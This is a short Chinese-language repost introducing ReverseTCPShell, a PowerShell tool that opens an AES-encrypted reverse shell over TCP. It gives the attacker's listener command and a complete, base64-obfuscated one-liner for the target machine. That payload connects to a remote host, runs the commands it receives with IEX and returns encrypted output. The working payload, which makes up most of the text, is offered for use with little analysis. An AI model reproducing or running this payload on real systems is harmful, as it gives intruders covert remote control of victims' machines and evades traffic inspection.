ReverseTCPShell:使用PowerShell通过TCP反弹加密Shell

ReverseTCPShell 反弹加密shell

一个通过TCP加密(AES 256位)反弹Shell的工具,使用PowerShell。

使用

攻击方 (C2-Server 监听):

PS> .\ReverseTCP.ps1

目标 (客户端):

ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEkAWABKADMAKwBBAE0AYgAzADIASgBXAEIAZgAyADkAdQBkAGoAcgBqAHYAeQBkAHUALwB4AFgARgBFAHUAYgB0AHQAVABhAHYAWAAwAGEAbwA9ACIAOwAkAEsAZQB5AD0AKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgBhAHMAZQA2ADQAKQApADsAJABDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAwAC4AMAAuADEAJwAsADQANAA0ADQAKQA7ACQAUwB0AHIAZQBhAG0APQAkAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAQgB5AHQAZQBzAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABSAGUAYQBkAD0AJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAeQB0AGUAcwAsACAAMAAsACAAJABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABDAG8AbQBtAGEAbgBkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB5AHQAZQBzACwAMAAsACAAJABSAGUAYQBkACkAOwAkAEQAZQBDAG8AZABlAD0AJABDAG8AbQBtAGEAbgBkACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQATwB1AHQAUAB1AHQAPQAoAEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAGkAbgBnAEEAdQB0AG8AKABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwBUAG8AQgBTAFQAUgAoACQARABlAEMAbwBkAGUAKQApACkAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQARQBuAEMAbwBkAGUAPQBDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABPAHUAdABQAHUAdAAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQAUwBlAG4AZABCAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQB4AGkAdAA=}))));Exit | PowerShell -

PoC

Payload 执行

ReverseTCPShell:使用PowerShell通过TCP反弹加密Shell
PowerShell反弹加密Shell

分析加密流量

ReverseTCPShell:使用PowerShell通过TCP反弹加密Shell
TCP反弹加密Shell

项目地址:https://github.com/ZHacker13/ReverseTCPShell